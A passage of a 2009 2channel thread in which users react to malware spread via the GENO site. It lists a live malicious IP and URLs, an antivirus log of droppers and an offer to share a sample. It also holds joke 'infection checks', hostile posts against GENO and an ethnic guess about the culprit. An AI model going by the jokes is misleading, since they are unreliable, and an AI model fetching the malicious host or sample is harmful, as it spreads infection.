151 ボケ(愛知県):2009/04/07(火) 00:17:33.72 ID:3Qk1h4XE
>>147
ウィルスに感染するより困る状態か?
152 ヘビイチゴ(アラバマ州):2009/04/07(火) 00:18:33.92 ID:lhyoCUbm
HIPS導入してる奴でトロイ送られたのは誰かいないのか?
AVで検知できなくても実行は阻止できただろ
つーかそんなあからさまなウイルスならヒューリスティックで検知できそうなもんだけど
153 ボタン(アラバマ州):2009/04/07(火) 00:19:15.22 ID:paLqG5K8
NOD32を仮想のXPに入れ替えて本PCにカスペルスキー
買って入れようと思うのだがいくらぐらいするの?
あとネットから手軽にインスコできる?
154 アルストロメリア(愛知県):2009/04/07(火) 00:19:18.05 ID:PpAfGl6U
>>151
ソーリー・・・・・
155 ヒヨクヒバ(東京都):2009/04/07(火) 00:19:19.82 ID:XFw7JL/V
Javascript多用のサイトが多いのが困る
156 福寿草(関西地方):2009/04/07(火) 00:19:48.19 ID:rk/eWebU
C:\Documents and Settings\村岡隆\My Documents\My Pictures\SEXY.JPG

この画像開いてからちょっとPCが重くなったんだが・・・
JPGは大丈夫だよね?
157 アルストロメリア(西日本):2009/04/07(火) 00:20:18.79 ID:bIJ3TbD3
>>149
対処方法が明らかでないから二次被害を避けて自重している……なんてわけないか
158 ボタン(アラバマ州):2009/04/07(火) 00:20:43.05 ID:paLqG5K8
>>156
村岡Sexyウイルスか
159 アルストロメリア(西日本):2009/04/07(火) 00:21:00.31 ID:bIJ3TbD3
>>156
村岡隆に怒られるぞお前
160 バーベナ(catv?):2009/04/07(火) 00:21:18.89 ID:fH70gRk3
JPG仕込みって最近有名だよね
161 アルストロメリア(愛知県):2009/04/07(火) 00:21:33.22 ID:PpAfGl6U
今回のウイルスの名前は村岡sexyウイルスで決定か
162 イカリソウ(長屋):2009/04/07(火) 00:21:43.39 ID:x0MudcTT
村岡隆登場
163 ストック(愛知県):2009/04/07(火) 00:22:04.10 ID:vwosJmBt
>>156
よう村岡隆
164 ヤエヤマブキ(京都府):2009/04/07(火) 00:22:06.11 ID:a3TeJlzo
そんな名前のウィルスにパソコンつぶされるとかたまんねえよ!!!!!!!!
165 ヘビイチゴ(アラバマ州):2009/04/07(火) 00:22:07.18 ID:lhyoCUbm
>>153
どうせなら最近下がり目のカスペより高検出で且つ安いGDATAにすればいいのに
NOD使ってるくらいだからあまり良いスペックじゃないのかもしれんけど
166 オウレン(神奈川県):2009/04/07(火) 00:22:23.20 ID:R85rkQ1u
なかなかイイ名前だね
167 ハルジオン(コネチカット州):2009/04/07(火) 00:22:46.73 ID:UhREyoqJ
ここから村岡スレ
168 ヒヤシンス(福岡県):2009/04/07(火) 00:22:53.09 ID:pnDf58uK
村岡sexyウィルスか
語呂もいいしこれでいいな
169 サトザクラ(東京都):2009/04/07(火) 00:22:57.71 ID:9VC7AOSz
普通の人なら
交通事故起こしたら、
通報してけが人の搬送に協力したり、
発煙筒焚いたり、三角のやつ立てたりして、
他の車や人に危害を与えないような措置をとりますよね。

家から火が出たら通報しますね。
まー第一は自分のためだけど、
よそに飛び火させない配慮として、
すぐ119番しますよねー

そういうことしてないんだから、
類推判断でいえば、
「未必の故意」

だからGeno死ね

で、殺し方w
genoウイルス で、いろんなサイトで
検索しまくろう。

グーグルの、
「急上昇キーワード」
にのせてしまおう 
170 イワザクラ(東京都):2009/04/07(火) 00:23:09.16 ID:3rFtlOL+
村岡と言えば
171 オウレン(埼玉県):2009/04/07(火) 00:23:15.59 ID:J9fZ7s49
こういうのってブラウザ側が対処するもんだろ
172 ヤエヤマブキ(福岡県):2009/04/07(火) 00:23:29.59 ID:pgsxCmAv BE:82229832-2BP(8000)

>>156
何か嫌な名前だな
173 ツルハナシノブ(千葉県):2009/04/07(火) 00:23:44.78 ID:+EO0IjVV
174 ヒメオドリコソウ(秋田県):2009/04/07(火) 00:23:48.02 ID:mvp3rGPp
>>156
名前晒してますよ
175 クレマチス・モンタナ(コネチカット州):2009/04/07(火) 00:24:04.13 ID:UhREyoqJ
いいから早くセクムラウイルスの詳細よこせよ
176 キクザキイチゲ(福岡県):2009/04/07(火) 00:24:14.22 ID:8Doz9pYt
白鯛は許さない
177 ビオラ(コネチカット州):2009/04/07(火) 00:24:20.73 ID:EFJaFBRI
セロリンたんじゃアバスト重いお・・・
178 サトザクラ(dion軍):2009/04/07(火) 00:24:24.95 ID:ly823CjS
>>173
死ね
179 アルストロメリア(愛知県):2009/04/07(火) 00:24:53.33 ID:PpAfGl6U
>>178
ありがとう 踏むところだった
180 ストック(愛知県):2009/04/07(火) 00:25:02.12 ID:vwosJmBt
もう村岡隆Sexyウィルスでいいよ
181 アクイレギア・スコプロラム(catv?):2009/04/07(火) 00:25:14.97 ID:CUfo3bUt
村岡隆ってmu-サソ?
182 オニノゲシ(大阪府):2009/04/07(火) 00:25:33.11 ID:cammyN+/
>>156
VIPPER乙
183 オランダミミナグサ(コネチカット州):2009/04/07(火) 00:25:35.38 ID:uMimjOnU
>>170
うめしば
184 マンサク(岩手県):2009/04/07(火) 00:25:40.78 ID:a+URb3FB
>>136
OSを入れない
185 サトザクラ(千葉県):2009/04/07(火) 00:25:41.55 ID:5NnR5PGs
また岡ちゃんがウイルスに掛かったのか
186 サトザクラ(東京都):2009/04/07(火) 00:25:41.95 ID:CTlb1CUm
>>175
村岡隆はスケベ
187 ヒメマツムシソウ(dion軍):2009/04/07(火) 00:25:51.57 ID:La21hUVk
ええええええ踏んでないのにすでにリンクの色かわっとル
188 ハナモモ(宮崎県):2009/04/07(火) 00:25:53.06 ID:07SNJE2W
>>176
それは村岡違いや
189 コバノランタナ(千葉県):2009/04/07(火) 00:26:01.16 ID:hD4R3NI8
>>183
うんうんw
190 雪割草(埼玉県):2009/04/07(火) 00:26:12.27 ID:VooNcjnB
村岡隆セクシー(笑)
191 ユリオプスデージー(埼玉県):2009/04/07(火) 00:26:18.04 ID:9ywWHThL BE:1506985867-PLT(12222)

メモリが激しく動いてなければおk?
192 アルストロメリア(愛知県):2009/04/07(火) 00:26:21.66 ID:PpAfGl6U
>>180
長い
村岡隆ウイルスsex でいい
193 ニオイタチツボスミレ(兵庫県):2009/04/07(火) 00:26:25.95 ID:2Etgg6kd
>>170
ケツ毛バーガーこと村岡万由子さんのことはもう許してやれよ
194 水芭蕉(中部地方):2009/04/07(火) 00:27:35.34 ID:aRhF2J1+
完全に村岡隆に乗っ取られた
195 サトザクラ(dion軍):2009/04/07(火) 00:27:48.33 ID:uS2Hnc6/
タカ坊ときいて
196 シャクナゲ(愛知県):2009/04/07(火) 00:27:52.24 ID:4xy7qK7J
とりあえずAVGでウイルススキャンしとこ^^
197 ストック(愛知県):2009/04/07(火) 00:28:01.65 ID:vwosJmBt
セクシー村岡
198 ユキノシタ(アラバマ州):2009/04/07(火) 00:28:11.69 ID:U5kGohUA
Geno ウイルス、 PDF と exe には対応したようだ。

\dropper.pdf
[0] Archive type: PDF Stream
--> Object
[DETECTION] Contains recognition pattern of the EXP/Pidief.vtb exploit
[WARNING] The file was ignored!
\dropper.swf'
\malformed.jquery.js'
\monitor.bin'
\dropper.bin'
[DETECTION] Contains a recognition pattern of the (harmful) BDS/Agent.afid back-door program
[WARNING] The file was ignored!
\dropper.html'
199 ヤブテマリ(秋田県):2009/04/07(火) 00:28:43.91 ID:oDhoq9FJ
村岡隆ってカイジかw
200 ビオラ(山梨県):2009/04/07(火) 00:29:10.85 ID:dRIZS+Cl
>>156
村岡隆さん初めますて^^
201 イワザクラ(東京都):2009/04/07(火) 00:29:16.33 ID:3rFtlOL+
もうケツ毛タカシでいいよ
202 福寿草(関西地方):2009/04/07(火) 00:29:58.16 ID:rk/eWebU
村岡隆って誰だよwwwwww俺しらねーしwwwwwwww
203 ベゴニア・センパフローレンス(catv?):2009/04/07(火) 00:30:11.27 ID:rKNLNjUW
リカバリマンドイ
204 ツボスミレ(関西地方):2009/04/07(火) 00:30:16.46 ID:QovEsDQc
SEXY隆
205 トサミズキ(アラバマ州):2009/04/07(火) 00:30:32.37 ID:VrCPw4Dy
プニルのnoscriptもどきのおかげで助かったw
206 ストック(愛知県):2009/04/07(火) 00:30:33.15 ID:vwosJmBt
>>202
まぁまぁ落ち着けよ隆
207 キクザキイチゲ(福岡県):2009/04/07(火) 00:30:35.30 ID:8Doz9pYt
>>202
どうしたムラ?
208 アルストロメリア(愛知県):2009/04/07(火) 00:30:51.45 ID:PpAfGl6U
ウイルスSEXY-TAKASI-
209 センダイハギ(千葉県):2009/04/07(火) 00:30:53.99 ID:wchpM5xR
>>173
ソースチェッカーで開こうとしたらなぜか対象をブラウザで開くをクリックしてた
もう寝るか
210 イワザクラ(東京都):2009/04/07(火) 00:31:06.04 ID:3rFtlOL+
>>202
よう村岡
211 サイネリア(東京都):2009/04/07(火) 00:31:12.09 ID:1+Jo/4Bf
>>202
村岡隆さん、名札ついてますって
212 スィートアリッサム(アラバマ州):2009/04/07(火) 00:31:25.59 ID:qxFx8kHE
サイト復活してたのね
これ、もう大丈夫なの?

しかし、謝罪一切なしかw
213 タネツケバナ(大阪府):2009/04/07(火) 00:31:51.53 ID:RlAeb+JK
最後がjpgで専ブラでカーソル合わせただけでも感染?
214 キショウブ(大阪府):2009/04/07(火) 00:32:42.60 ID:yijLK8q+
ここの連中も釣られてやんのww
215 アルストロメリア(愛知県):2009/04/07(火) 00:32:47.61 ID:nWHGtexG
>>209
>※このアドレスは危険URLのひとつです。
>危険!mailtoストームを発見! (1115)
><img src="http://strange.kurumi.ne.jp/bbs.cgi/pedo1">
ワロタ
216 マンサク(岩手県):2009/04/07(火) 00:33:32.92 ID:a+URb3FB
「サーバーに一部不具合がございました。」

この程度かw
217 ベゴニア・センパフローレンス(catv?):2009/04/07(火) 00:33:38.92 ID:rKNLNjUW
>>213
それはない
218 アルストロメリア(愛知県):2009/04/07(火) 00:34:10.65 ID:PpAfGl6U
GENOはもう行っても大丈夫なのか?
219 フデリンドウ(東京都):2009/04/07(火) 00:34:51.08 ID:UPpZUNuf
>>213
なんとも無いみたい、が
安価にカーソル合わせたらAVGが反応した
220 クロッカス(catv?):2009/04/07(火) 00:34:52.89 ID:t0rVrEXJ
駄目
221 シラネアオイ(福島県):2009/04/07(火) 00:36:13.04 ID:ZlGID39V
ウィルス撒き散らしながら商売致しますってか
なんかもうヤケクソだな
222 ヤエヤマブキ(京都府):2009/04/07(火) 00:36:21.83 ID:a3TeJlzo
確かカーソル合わせただけでも駄目なんじゃなかったっけ?
223 クンシラン(和歌山県):2009/04/07(火) 00:36:48.64 ID:oMzDAMFd
タスクマネージャー開いてtaskmgr.exeがあったらアウト
224 ヤエヤマブキ(福岡県):2009/04/07(火) 00:37:02.87 ID:pgsxCmAv BE:986753489-2BP(8000)

>>219
怖いからlive2chのポップアップ機能変更しとこ
225 アルストロメリア(愛知県):2009/04/07(火) 00:37:05.76 ID:PpAfGl6U
>>222
専ブラ使いこなせなくてつい最近アンインストールしててよかった
226 ヤエヤマブキ(京都府):2009/04/07(火) 00:37:11.88 ID:a3TeJlzo
な、なんだってー
227 ストック(愛知県):2009/04/07(火) 00:37:17.61 ID:vwosJmBt
>>213
サムネが出てたらご愁傷様
228 ラフレシア(東京都):2009/04/07(火) 00:37:19.74 ID:Yn6ot/oR
社員共スレ潰し作業乙w
229 ウグイスカグラ(広島県):2009/04/07(火) 00:37:49.27 ID:A7qij7bZ
230 カンガルーポー(アラバマ州):2009/04/07(火) 00:37:57.45 ID:mm7RXbmX
JavaScriptを無効にしていれば大丈夫だろうし、Adobe ReaderやFlash Playerを最新版にしてあれば問題なさそうだけどな。
でもJavaScriptなしのウェブってもう考えられない感じだし、面倒だけどこれからもマメにソフトをアップデートするしかないな。
231 アルストロメリア(愛知県):2009/04/07(火) 00:38:08.84 ID:PpAfGl6U
>>223
Windowsフォルダ削除してくる\(^o^)/
232 ゲンカイツツジ(関東地方):2009/04/07(火) 00:38:14.71 ID:dei4a9zR
まさにGENO
233 シラネアオイ(福島県):2009/04/07(火) 00:39:00.42 ID:ZlGID39V
俺は怪しいjpgを専ブラで開くといつも
読み込むんだけど最後にデコードエラーと出て真っ赤になるぜ
これは大丈夫だろう
234 ユキワリコザクラ(埼玉県):2009/04/07(火) 00:39:04.52 ID:2Xsqg4pY
GENOの由来はジェノサイド まちめきしな
235 ビオラ(アラバマ州):2009/04/07(火) 00:39:23.46 ID:bWQ+iy28
>>213
マウスオーバーで画像を開く にチェックいれて画像すれみてたら
以前カスぺが反応したことあるよ

だから今回は知らないが安全とはいえないのでは
236 ラフレシア(東京都):2009/04/07(火) 00:39:34.76 ID:Yn6ot/oR
同業者をジェノサイドするつもりがお客をジェノサイドw
237 シナノコザクラ(福岡県):2009/04/07(火) 00:39:45.42 ID:se8lpk3k
デコードエラー+画像キャッシュにトロイが見つかる
238 アルストロメリア(愛知県):2009/04/07(火) 00:39:49.83 ID:nWHGtexG
マウスオーバーで開く設定にしてるからだろ
239 ボタン(静岡県):2009/04/07(火) 00:40:16.06 ID:4m6ksm3L
avast入れてる人、他のソフト入れてないの?
ファイアウォール対策ソフトとか
240 サイネリア(栃木県):2009/04/07(火) 00:40:27.98 ID:cc2QZmb2
かかったやつどれくらいいいんの
241 モリシマアカシア(東京都):2009/04/07(火) 00:40:38.66 ID:fhtlRrYZ
周りが騒いでるからとりあえずTOPを閉鎖しておいて、
ほーむぺーじ作ってもらった会社に直してもらうまで放置なんじゃないかね
242 アルストロメリア(愛知県):2009/04/07(火) 00:40:59.06 ID:PpAfGl6U
>>240
500人いたとして450人ぐらい感染
243 マンサク(岩手県):2009/04/07(火) 00:41:07.96 ID:a+URb3FB
GENO側ではまだ原因も分からなければ対策も何もしてないっぽいから、
不安ならアクセスしないほうがいい。
244 ユッカ(北海道):2009/04/07(火) 00:41:09.15 ID:5Z488xfE
不具合ありました
すまねで許されるの?

他の国だったら禁固5年か10万ドル以上の罰金確定なんだけど
245 フジスミレ(アラバマ州):2009/04/07(火) 00:41:31.06 ID:6pPwwKqG
firefoxでよかった
246 ハナワギク(北海道):2009/04/07(火) 00:41:59.58 ID:mSg2gEOd
ノートンは無力だよなあ。
まったく役になっていないわあ。(´・ω・`)ショボーン

あと2週間で切れるから他社製品に切り替えるわ。
247 サトザクラ(dion軍):2009/04/07(火) 00:42:23.66 ID:uS2Hnc6/
火狐なら平気なのか?
248 タネツケバナ(大阪府):2009/04/07(火) 00:42:38.25 ID:RlAeb+JK
そっか…
画像プレビューポップアップを無効にしておこう

>>227
普通に写真画像とかが出ても偽装で実は混入してるとかあるのかな
249 ヤエヤマブキ(京都府):2009/04/07(火) 00:42:53.63 ID:a3TeJlzo
Javaきってないと火狐でもアウト
250 オオバコ(長屋):2009/04/07(火) 00:43:01.08 ID:jJNoS11x
カスペとAvast以外は全て無力だったぞ。どこに乗り換えるんだよ。
251 ニリンソウ(福岡県):2009/04/07(火) 00:44:06.63 ID:RbWqx5rG
仕事用のPC感染した\(^o^)/マジデ人生オワタ
252 ヒヤシンス(福岡県):2009/04/07(火) 00:44:08.30 ID:pnDf58uK
線ブラでjpgのサムネがでる設定でもアウトなのか?
253 センダイハギ(千葉県):2009/04/07(火) 00:44:16.84 ID:wchpM5xR
寝る前に仮想PCで丸裸の状態で踏んでみるか
254 アルストロメリア(愛知県):2009/04/07(火) 00:44:34.74 ID:PpAfGl6U
PDFとフラッシュの奴を最新のにするとするか・・・
255 オオバコ(長屋):2009/04/07(火) 00:46:27.22 ID:jJNoS11x
IEコンポの専ブラはIEの設定によってはアウト
256 ストック(愛知県):2009/04/07(火) 00:46:34.27 ID:vwosJmBt
以前にも開いた瞬間にjaneが落ちて起動できなくなるjpgとかあった気がする
まぁこれからは何踏むとしてもそいつのIDやらそいつへのレスをよく見るんだな
257 ヤエヤマブキ(福岡県):2009/04/07(火) 00:46:57.69 ID:pgsxCmAv BE:438557748-2BP(8000)

>>239
avastと相性いいのがどうも見つからないんでMS任せ
258 キバナノアマナ(東京都):2009/04/07(火) 00:47:47.32 ID:0vDWarrT
>>251
こういう奴多いな、メシウマw
259 ロウバイ(西日本):2009/04/07(火) 00:47:57.88 ID:Mmvo1tQ5
お前ら未だやって田野かよ
260 バラ(コネチカット州):2009/04/07(火) 00:48:00.52 ID:+rq35u3/
>>251
無茶しやがって・・・
261 アヤメ(アラバマ州):2009/04/07(火) 00:48:04.12 ID:bkbnravR
262 ガザニア(dion軍):2009/04/07(火) 00:48:05.10 ID:dSO2WajJ
>>202
クソワロタwwwwwww
263 ラフレシア(東京都):2009/04/07(火) 00:48:16.78 ID:Yn6ot/oR
genoをばんばんヤバリストに登録するだけw
264 マンサク(長野県):2009/04/07(火) 00:48:39.32 ID:Dql0WP7n
今このスレみつけた
数時間前にしっかり踏んでた
オワタ
265 アルメリア(長屋):2009/04/07(火) 00:49:22.50 ID:P/l2+MNt
>>251
二番煎じ乙
266 ヤエヤマブキ(福岡県):2009/04/07(火) 00:49:28.18 ID:pgsxCmAv BE:657835586-2BP(8000)

>>251
なし仕事中にするんねw
267 ハナワギク(北海道):2009/04/07(火) 00:49:44.80 ID:mSg2gEOd
>>708
IE→インターネットプロパティ→設定→ファイル表示でフォルダ開いて
94.247.2.195/jquery.jsがいるかどうかじゃないかなあ。

これって削除してもいいんですかね。
268チン顧問 ◆RitalinnSs :2009/04/07(火) 00:50:28.90 ID:527le3RN
で、かかったとして
何がどうなるの?
269 サトザクラ(北海道):2009/04/07(火) 00:50:39.18 ID:kufKBzPx
ちょっとavastについて教えてほしいんだが
ログのれベルってあるけどウイルス検査とかでウイルス見つかったらログとるようにするにはどれに設定すればいいの?
それとjaneみたいな2chブラウザで開いてる画像とかもウイルスやスパイウェア検出してくれる?
してくれてない感じなんだけど
270 アルストロメリア(愛知県):2009/04/07(火) 00:51:21.95 ID:PpAfGl6U
>>268
感染状態で再起動→ご冥福
271 ニリンソウ(福岡県):2009/04/07(火) 00:51:37.53 ID:RbWqx5rG
楽天も感染してたんだろ・・・・
いつも楽天見てるオバチャンのせいに・・・・なんかしないぜ・・・・・^^

あああああああああああああああああああああ寝たくねぇえええええええええええええええええ
会社行きたくねえええええええええええええええええええええええええ
272 ヘビイチゴ(静岡県):2009/04/07(火) 00:51:37.76 ID:Fe1RTXma BE:876765964-PLT(16543)

>>268
・PDFファイルとかシステムファイルがなぜか増殖する
・メモリを馬鹿食いする
・再起動時にブルースクリーン
273 スミレ(アラバマ州):2009/04/07(火) 00:51:41.47 ID:Fg25U0So
>>261
下のは斧じゃないwwwww
274 アルストロメリア(愛知県):2009/04/07(火) 00:52:36.03 ID:PpAfGl6U
>>271
楽天もだめなの? 楽天で中古パソコンあさってた俺どうなるの? 今の所感染してないが
275 斑入りカキドオシ(神奈川県):2009/04/07(火) 00:52:36.22 ID:+su157I6
とりあえずNoScript導入した。
これいいわ
276 ジギタリス(千葉県):2009/04/07(火) 00:53:04.70 ID:76p65VsL
コレ結局GENOは不具合がありましたで済ませるつもりか?w
277 ハナワギク(北海道):2009/04/07(火) 00:53:14.66 ID:mSg2gEOd
>>272
その三つの症状はないがオンラインスキャンをブロックされているような動作が感じられるのはなぜだろう。。。
278 カラスビシャク(東京都):2009/04/07(火) 00:53:43.58 ID:FHQHfmz1
この隙に、掘り出し物をと思ってアクセスしたのに
相変わらずのゴミだらけでワロタ
279 アルストロメリア(愛知県):2009/04/07(火) 00:54:29.47 ID:PpAfGl6U
マカフィーウイルスすきゃん 2件検出 2件隔離
これは大丈夫なのか・・?
280 ニリンソウ(福岡県):2009/04/07(火) 00:54:36.75 ID:RbWqx5rG
>>274
楽天の一部らしい
どこかは知らん
大丈夫お前は踏んでねーよ
281 シンフィアンドラ・ワンネリ(東京都):2009/04/07(火) 00:54:37.27 ID:fyWwPTeG
俺も踏んだけど結局何もなかった
重くなったからすぐブラウザ閉じたけど
282 オニノゲシ(大阪府):2009/04/07(火) 00:55:10.57 ID:IV9ngAhn
>>278
皆やること同じだなw
283 アルストロメリア(愛知県):2009/04/07(火) 00:55:18.24 ID:PpAfGl6U
>>280
一瞬顔面クレイジーになったけど安心した
284 カンガルーポー(アラバマ州):2009/04/07(火) 00:55:20.14 ID:mm7RXbmX
これブラウザの脆弱性とは関係ないんだろ、だからどのブラウザ使っているかどうかは問題じゃない。
結局、使っているソフトはセキュリティパッチが出たらすぐアップデートできるよう注意し続けるしかないよ。
パッチ未適用でもアンチウイルスがカバーしてくれるかどうかに賭けてもしょうがないし。
285 バラ(コネチカット州):2009/04/07(火) 00:55:28.11 ID:+rq35u3/
GENOはどれだけ殉職者を増やすつもりだ
絶対に許さない(`;ω;´)
286チン顧問 ◆RitalinnSs :2009/04/07(火) 00:55:58.17 ID:527le3RN
>>270>>272
ありがとありがと

じゃあボクのPCが今かかってるのとは違うや

spybot走らせると途中でワトソン博士がうんたらかんたら言って
処理が止まっちゃうやつだから
287 モリシマアカシア(東京都):2009/04/07(火) 00:56:19.46 ID:fhtlRrYZ
ホワイトリスト方式でcookie受けるアドオンない?
288 キクザキイチゲ(静岡県):2009/04/07(火) 00:56:37.83 ID:udlrcte1
感染確認するにはどうすりゃいい?
289 ヤエヤマブキ(京都府):2009/04/07(火) 00:57:04.76 ID:a3TeJlzo
再起動
290 サトザクラ(dion軍):2009/04/07(火) 00:57:11.60 ID:uS2Hnc6/
再起動しておかしなことにならなかったら平気なんだね
安心したからシコって寝よ
291 ハナビシソウ(関西地方):2009/04/07(火) 00:57:27.18 ID:HRQhxBob
情弱共哀れwwwwwwww











とか言ってる俺も
間違ってzip偽装踏んじまったんだけどな
まあ、フラッシュはたまたま最新版だったし、何よりOperaでフラッシュはその時切ってたからマジ無問題

やっぱ情弱哀れwwwwwwwwwwww
292 姫カンムリシャジン(埼玉県):2009/04/07(火) 00:57:32.95 ID:I3vFQxXL
netstat /a とかで感染わかるの?
293 ヤエヤマブキ(福岡県):2009/04/07(火) 00:57:42.01 ID:pgsxCmAv BE:863409479-2BP(8000)

>>269
http://www.iso-g.com/modules/xfsection/article.php?articleid=33
janeは知らんがlive2chならよく教えてくれるぞ
294チン顧問 ◆RitalinnSs :2009/04/07(火) 00:57:57.19 ID:527le3RN
でもそうすると
犯人は朝鮮人?

このタイミングだし
295 ヤエヤマブキ(京都府):2009/04/07(火) 00:58:14.05 ID:a3TeJlzo
被害はどれくらいなのかねえ
296 ボロニア・ピンナタ(長屋):2009/04/07(火) 00:58:49.08 ID:9H6YK50+
感染したらどうなるのか?については報告者によってまちまちなんだよね
とりあえずラトビアと通信してpdfやらswfを落として何か悪さをするらしい

http://tsushima.2ch.net/test/read.cgi/news/1238897231/572-
572 名前: 姫カンムリシャジン(北海道)[] 投稿日:2009/04/05(日) 17:30:38.90 ID:SJFT5u/E
genoのサイトを開くと以下のURLが呼ばれるんだが

  94.247.2.195/news/?id=100 (IEの場合こっちが呼ばれる)
  94.247.2.195/news/?id=101 (それ以外の場合こっちが呼ばれる)

うちの環境ではどちらを開いても以下のコードしか出てこない。

  // No news...<script>
  var t=new Date(1148027392000);document.cookie="miek=1; expires="+t.toGMTString()+"; path=/";
  //</script>

ただcookieを書き込んでるだけ。よって何も起こらない。
しかしどうも前スレの報告によると、このURLにPDFやswfをダウンロードさせるコードが含まれてる場合もあるみたいなんだよな。
とりあえずうちでは攻撃が確認できないので、これ以上の解析は無理だ
297 ヘビイチゴ(静岡県):2009/04/07(火) 00:58:58.91 ID:Fe1RTXma BE:730638645-PLT(16543)

>>288
とりあえずタスクマネージャー
298 イカリソウ(長屋):2009/04/07(火) 00:59:03.73 ID:x0MudcTT
>>291
踏んだ時点で不安は払拭されなくなるんだよなwwwwwww
avastがマルウェア拒否したけど
やっぱ不安wwwwwwwwwwwww
299 キクザキイチゲ(静岡県):2009/04/07(火) 00:59:10.53 ID:udlrcte1
>>269
時たま教えてくれるよ
300 ジギタリス(大阪府):2009/04/07(火) 01:00:31.21 ID:M7yc5BsS
>>288
maro zip zip oppai

をメモ帳に打ち込んで保存。コピペ可。
一度閉じて開いた時文字化けしてればキンタマ感染中
301 ヤエヤマブキ(福岡県):2009/04/07(火) 01:00:39.33 ID:pgsxCmAv BE:740065469-2BP(8000)

>>296
亜種が多いって事なのかな
302 プリムラ・ビオラケア(徳島県):2009/04/07(火) 01:01:44.30 ID:l63WHP96
カスペのオンラインスキャン
303 ノミノフスマ(香川県):2009/04/07(火) 01:02:16.82 ID:/rot5vto
>>297
タスクマネージャ見たけど何があればアウトなの
304 オオバコ(長屋):2009/04/07(火) 01:02:19.06 ID:jJNoS11x
NoScriptの許可リストに入れてるようなサイトが狙われるともう大変なことになるな
305 フリージア(東京都):2009/04/07(火) 01:02:49.11 ID:aQV3b+FB
ESET(NOD32)はまだ対応してないくさいな。
PDF落としてきてスキャンしたんだがスルーだ。
306 キクザキイチゲ(静岡県):2009/04/07(火) 01:03:12.64 ID:udlrcte1
メモリ一番食ってるのはashWevSvだけだった
ありがとう寝る
307 サトザクラ(東京都):2009/04/07(火) 01:04:18.25 ID:YcIo+r6z
>>292
netstat -nb
cmd.exeが接続先「94.247.2.195」とかならアウト
308 ムラサキサギゴケ(大分県):2009/04/07(火) 01:04:27.63 ID:tk8lvfBv BE:82197825-2BP(7222)

* 8世紀 - ヴァイキングが進出。居留地のみ。
* 13世紀初めごろに、リヴォニア帯剣騎士団が領有を始める。
* 1629年 - リヴラント(スウェーデン)とクールラント(ポーランド)に分裂。
* 1730年 - リヴラントもクールラントも事実上ロシア帝国の支配下に。
* 1920年1月13日 - ロシア帝国から独立。
* 1940年8月5日 - ソ連に併合される。
* 1991年8月21日 - ソ連から独立を回復。
* 2004年5月1日 - 欧州連合 (EU) に加盟
309 ムレスズメ(アラバマ州):2009/04/07(火) 01:04:35.43 ID:bEpmszmf
今回の騒ぎで短縮URLがやばいってのがよーくわかった
いろんな人騙しやがってちくしょうめ
310 アルストロメリア(愛知県):2009/04/07(火) 01:04:38.00 ID:PpAfGl6U
メモリとCPU一番食ってるのマカフィーだった
311 モモイロヒルザツキミソウ(東京都):2009/04/07(火) 01:05:01.58 ID:bOygpSnt
312 ユキノシタ(アラバマ州):2009/04/07(火) 01:05:22.58 ID:EDUFhTK5
>>269
このスレ開いただけで検知した(ImageViewURLReplace.dat使用)
313 ホトケノザ(岩手県):2009/04/07(火) 01:05:28.72 ID:NylUeWOX
ESETの3990来たな
UpdateInfoは未公開っぽいが
314 姫カンムリシャジン(埼玉県):2009/04/07(火) 01:07:52.00 ID:I3vFQxXL
>>307
サンクス
315 ヒメスミレ(埼玉県):2009/04/07(火) 01:07:52.62 ID:DjsX1FHd
「GENO担当者の脳に一部不具合がございました。」
316 ツメクサ(東京都):2009/04/07(火) 01:07:52.54 ID:j2IQDFOZ
             /)
           ///)
          /,.=゙''"/             人人人人人人人人人人人人
         i f ,.r='"-‐'つ____     <                  >
        /   _,.-‐'~/__,  , ‐-\    < こまけぇことは・・・ん?   >
        ,i   ,二ニ (●). (●) \   <                  >
       ノ    il゙フ   (__人__)    \  YYYYYYYYYYYYYYYYYYYYYYY
      ,イ「ト、  ,!,!|       ̄`      |
     / iトヾヽ_/ィ"\           /


==========================
    l ヽ. |   |  |   |
.   | __| | __ | |^)_ |    ,-、
   _ |  | |   | .|ノ  |.    i  ヽ
  i'i. ヽ. -‐、 !   !-! ‐- ヽ.  〉、 l
 / _ ノ.ヽ. `' (ノo(ヽ/   ヽノ (ノ |
 ヽ. ,`ヽ,ソ    )ノ   ノ/o   |
   \ '  / / l     ()ヽ l
    ヽ.   '    |  (⌒ヽ  |
     ヽ.     |   しノ  /
==========================
317 マーガレットタンポポ(中国地方):2009/04/07(火) 01:08:07.36 ID:YTv0e6aI
バスターの自動アップデート来たから期待してたのにクッキーしか検出しないw
318 キランソウ(福岡県):2009/04/07(火) 01:08:24.22 ID:01FCm4gy
319 フリージア(東京都):2009/04/07(火) 01:09:11.99 ID:aQV3b+FB
>>313
94.247.2.195/news/?id=3
のPDFはスルーのようだ。
まぁこれが本体とは限らないけど。
320 キクザキイチゲ(福岡県):2009/04/07(火) 01:09:16.82 ID:8Doz9pYt
94.247.2.195から落としたLa.exe誰か要るか?
321 カントウタンポポ(関東・甲信越):2009/04/07(火) 01:09:44.84 ID:2iC5vGDl
再起動してブルースクリーンにならないでタスクマネージャ起動してcmd.exeが無ければ大丈夫なのか?
322 水芭蕉(中部地方):2009/04/07(火) 01:10:16.35 ID:aRhF2J1+
>>318
取りあえず振り分け無しのフォルダに保存しようかと思ったが
なんか顔がムカつくのでやめた
323 コバノランタナ(千葉県):2009/04/07(火) 01:10:55.87 ID:hD4R3NI8
>>301
うちも実際に発症していないんで、>>296さんの説と亜種がわんさかって事以外に関してあくまで仮説だけど、
id=ほにゃらら の処理が行われるとCPU負荷率が余りに高くなりすぎて
ウィルスのスクリプトが完走しないって事なんかも考えられるかも。
324 キランソウ(福岡県):2009/04/07(火) 01:11:05.89 ID:01FCm4gy
>>320
virustotalにうpれば?
325 ヒマラヤユキノシタ(福岡県):2009/04/07(火) 01:11:20.33 ID:vdumWT6M BE:361131146-PLT(12190)

これを期にAVGからavast!に乗り換えたわ
つかまだこのウイルスの全容が見えないとは
326 キランソウ(福岡県):2009/04/07(火) 01:12:19.72 ID:01FCm4gy
>>322
おれもだ、保存するまではないけどjaneのキャッシュに残しとこうと思って貼った
327 ムラサキハナナ(アラバマ州):2009/04/07(火) 01:12:33.54 ID:VjYRIe8b
もう丸見えだろ
328 ヤエヤマブキ(福岡県):2009/04/07(火) 01:14:26.99 ID:pgsxCmAv BE:287803837-2BP(8000)

>>323
どちらにしてもイヤなウイルスだな
329 タネツケバナ(新潟県):2009/04/07(火) 01:15:07.98 ID:06Ad6Iwx
で、>>75の奴で検査した奴いるの?
330 メギ(東京都):2009/04/07(火) 01:15:27.12 ID:SNZhFgrd
